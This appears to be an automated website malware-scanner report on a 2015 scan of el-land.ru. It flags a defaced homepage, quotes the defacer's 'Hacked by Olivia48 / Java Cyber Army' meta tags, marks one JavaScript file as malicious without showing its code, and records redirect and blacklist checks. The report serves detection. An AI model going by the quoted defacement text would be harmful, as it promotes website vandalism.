Scanned pages/files
Request | Server response | Status |
http://el-land.ru/ | 200 OK Content-Length: 19903 Content-Type: text/html | suspicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
Deface/Content modification. The following signature was found: This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we ...[506 bytes skipped]... n" class="no-js"> <link rel="shortcut icon" href="http://i.imgur.com/QYUFm5u.png"> <meta charset="UTF-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>--|olivia48|--</title> <META NAME="description" CONTENT="This Site Has Been Hacked by Olivia48 We are From Java Cyber Army and we'll do whatever we can,we mightn't use a weapon but We'll use stronger tools it's Our brains"> <META NAME="keywords" CONTENT="This Site Has Been Hacked by Olivia48, Hacked by Olivia48, Defaced by Olivia48, Olivia48 Was Here, Olivia48, Single Attacker, BlackHat, Hacker, Thief, ******, Defacer, Vuln, Inject, Leakforums, Maintenance"> <META NAME="robot" CONTENT="JAVA CYBER ARMY"> <META NAME="copyright" C ...[18932 bytes skipped]... | ||
http://el-land.ru/logs/content/ | 200 OK Content-Length: 54619 Content-Type: text/html | clean |
http://el-land.ru/logs/content/aopkcn44.js | 200 OK Content-Length: 3282 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
| ||
http://el-land.ru/logs/content/razdel.php?pid | 404 Not Found Content-Length: 221 Content-Type: text/html | clean |
http://el-land.ru/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173209 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173205 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173202 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173158 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173128 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173115 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173057 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173041 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813173017 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
http://el-land.ru/logs/content/content.php?pid/20120813172953 | 404 Not Found Content-Length: 222 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: el-land.ru
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache, max-age=0
Connection: close
Date: Thu, 11 Jun 2015 21:43:00 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Expires: Thu, 11 Jun 2015 21:43:00 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: google_adv2=0; expires=Thu, 23-Jul-2015 13:43:00 GMT
Set-Cookie: d2fb1624cb281074625429e88fbd8c6a=7b916117f5b281023e8820cc9f868b4a; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: el-land.ru
Referer: http://www.google.com/search?q=el-land.ru
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=el-land.ru
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://el-land.ru/
Result: el-land.ru is not infected or malware details are not published yet.